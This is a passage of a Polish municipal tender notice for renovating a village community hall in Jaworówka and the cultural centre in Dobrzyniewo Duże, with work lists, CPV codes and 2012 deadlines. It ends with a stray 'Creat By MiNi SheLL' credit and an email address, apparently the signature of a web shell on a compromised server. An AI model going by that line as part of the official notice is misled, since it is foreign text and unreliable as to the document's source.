- Wymiana instalacji centralnego ogrzewania
- Wymiana gniazd 230V i włącznika światła 
2. Pomieszczenia parteru
- Wydzielenie zaplecza kuchennego przez wykonanie lekkiej zabudowy z płyt gipsowo - kartonowych na konstrukcji stalowej i osadzeniem drzwi 90 pełnych i przemalowaniem ścian, sufitu w zakresie prowadzonych robót farbą emulsyjną, lamperia farbą ftalową.
Szczegółowy zakres zadania określa:
1.Szczegółowa Specyfikacji Techniczna Wykonania i Odbioru Robót stanowiąca Załącznik nr 4 do SIWZ
2.Istotne postanowienia umowy stanowiące Załączniki nr 5 do SIWZ 
3.Przedmiarach robót stanowiących Załączniki nr 6A do SIWZ
Wykonawca udzieli gwarancji na roboty budowlane objęte przedmiotem zamówienia na okres 24 miesięcy licząc od daty podpisania protokołu odbioru końcowego inwestycji.
Wybrany oferent przed podpisaniem umowy przedstawi kosztorys ofertowy, spełniający wymagania określone w Rozdz. XII SIWZ oraz harmonogram rzeczowo-finansowy.
Zaleca się aby każdy Wykonawca na własny koszt dokonał oględzin budynku celem sprawdzenia i zapoznania się z przyszłym terenem budowy oraz warunkami związanymi z wykonywaniem robót budowlanych objętych przedmiotem zamówienia oraz uzyskania informacji koniecznych do oceny i wyceny wszystkich robót i czynności niezbędnych do realizacji niniejszego zamówienia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.44.21.00-8, 45.42.11.30-4, 45.44.30.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Remont świetlicy wiejskiej w Jaworówce, Jaworówka 8A, 16-002 Dobrzyniewo Duże..</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest wykonanie remontu świetlicy wiejskiej w Jaworówce, Jaworówka 8A, 16-002 Dobrzyniewo Duże.
Świetlica wiejska w Jaworówce
1. Roboty wewnętrzne
- Likwidacja sceny
- Wyburzenie pieców kaflowych
- Uzupełnienie ścian i tynków
- Wydzielenie pomieszczenia sanitarnego z przystosowaniem do potrzeb osób niepełnosprawnych z lekkiej zabudowy z płyt gipsowo - kartonowych na konstrukcji stalowej i osadzeniem drzwi 90 pełnych i obłożeniem płytkami glazury na wysokość 2,0m
- Wymiana stolarki wewnętrznej
- Odmalowanie ścian i sufitów we wszystkich pomieszczeniach, z uprzednim szpachlowaniem, farbą emulsyjną, lamperie farbą ftalową
- Ułożenie płyty OSB 6mm na posadzce, ułożenie wytłumienia i wykonanie posadzki z paneli
podłogowych AC4 z oblistwowaniem
- Wymienić instalację elektryczną oświetleniową i gniazd wtykowych w całym obiekcie
- Wykonanie ogrzewania elektrycznego obiektu listwami grzejnymi
- Wykonanie instalacji wodno - kanalizacyjnej z wykonaniem wcinki do istniejącej instalacji
wodociągowej w piwnicy budynku i wyprowadzeniem kanalizacji sanitarnej na zewnątrz budynku
2. Roboty zewnętrzne
- Naprawa rynien i rur spustowych
- Przełożenie i uzupełnienie opaski budynku z płyt chodnikowych
- Wymurowanie kominów ponad dachem celem zapewnienia wentylacji pomieszczeń
- Wykonanie przyłącza kanalizacji sanitarnej do istniejącego szamba
Szczegółowy zakres zadania określa:
1.Szczegółowa Specyfikacji Techniczna Wykonania i Odbioru Robót stanowiąca Załącznik nr 4 do SIWZ
2.Istotne postanowienia umowy stanowiące Załączniki nr 5 do SIWZ 
3.Przedmiarach robót stanowiących Załączniki nr 6B do SIWZ
Wykonawca udzieli gwarancji na roboty budowlane objęte przedmiotem zamówienia na okres 24 miesięcy licząc od daty podpisania protokołu odbioru końcowego inwestycji.
Wybrany oferent przed podpisaniem umowy przedstawi kosztorys ofertowy, spełniający wymagania określone w Rozdz. XII SIWZ oraz harmonogram rzeczowo-finansowy.
Zaleca się aby każdy Wykonawca na własny koszt dokonał oględzin budynku celem sprawdzenia i zapoznania się z przyszłym terenem budowy oraz warunkami związanymi z wykonywaniem robót budowlanych objętych przedmiotem zamówienia oraz uzyskania informacji koniecznych do oceny i wyceny wszystkich robót i czynności niezbędnych do realizacji niniejszego zamówienia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.44.21.00-8, 45.42.11.30-4, 45.44.30.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Remont Gminnego Centrum Kultury w Dobrzyniewie Dużym, ul. Lipowa 71, 16-002 Dobrzyniewo Duże.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Przedmiotem zamówienia jest wykonanie remontu Gminnego Centrum Kultury w Dobrzyniewie Dużym, ul. Lipowa 71, 16-002 Dobrzyniewo Duże
Gminne Centrum Kultury w Dobrzyniewie Dużym
1. Roboty wewnętrzne
a) pomieszczenia biurowe i łazienka
- Wymienić instalację elektryczną oświetleniową i gniazd wtykowych
b) klatka schodowa + komunikacja I piętra
- Odmalowanie ścian i sufitów we wszystkich pomieszczeniach, z uprzednim szpachlowaniem, farbą emulsyjną, lamperie farbą ftalową
- Wymienić istniejącą posadzkę PCV na posadzkę z płytek gres z cokolikami
-Ułożyć płytki gres na schodach wraz z cokolikami
- Wymienić instalację elektryczną oświetleniową i gniazd wtykowych
2. Teren
a) Ogrodzenie
- Rozebranie istniejącego ogrodzenia i wyburzenie cokołu betonowego
- Wykonanie cokołu betonowego
- Zakres rzeczowy obejmuje również zakup i montaż słupków ogrodzeniowych o wymiarach 7cm/7cm z czapką w ilości 90 sztuk rozstawionych w fundamencie w odległości jeden od drugiego o 2,05 m. Słupek należy pomalować dwukrotnie farbą koloru czarnego. 64 słupki powinny zostać przystosowane do montażu na nich siatki ogrodzeniowej. Pozostałe 26 słupków powinny być gładkie bez jakichkolwiek naspawanych elementów. Wysokość słupka nad fundamentem - 1,50 m.- ta pozycja nie jest ujęta w przedmiarze.
b) Teren utwardzony
- Demontaż istniejącej nawierzchni z płyt betonowych
- Korytowanie i roboty ziemne
- Wykonanie podbudowy
- Ustawieni krawężników i obrzeży trawnikowych
- Ułożenie nawierzchni z kostki betonowej gr. 8cm
- Ułożenie chodnika z kostki betonowej gr. 6cm
c) Tereny zielone
- Rozrzucenie ziemi urodzajnej
- Wykonanie trawników dywanowych siewem
Szczegółowy zakres zadania określa:
1. Szczegółowa Specyfikacji Techniczna Wykonania i Odbioru Robót stanowiąca Załącznik nr 4 do SIWZ 
2.Istotne postanowienia umowy stanowiące Załączniki nr 5 do SIWZ 
3.Przedmiarach robót stanowiących Załączniki nr 6C do SIWZ)
Wykonawca udzieli gwarancji na roboty budowlane objęte przedmiotem zamówienia na okres 24 miesięcy licząc od daty podpisania protokołu odbioru końcowego inwestycji.
Wybrany oferent przed podpisaniem umowy przedstawi kosztorys ofertowy, spełniający wymagania określone w Rozdz. XII SIWZ oraz harmonogram rzeczowo-finansowy.
Zaleca się aby każdy Wykonawca na własny koszt dokonał oględzin budynku celem sprawdzenia i zapoznania się z przyszłym terenem budowy oraz warunkami związanymi z wykonywaniem robót budowlanych objętych przedmiotem zamówienia oraz uzyskania informacji koniecznych do oceny i wyceny wszystkich robót i czynności niezbędnych do realizacji niniejszego zamówienia.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.00.00.00-7, 45.44.21.00-8, 45.42.11.30-4, 45.44.30.00-4.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 20.11.2012.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com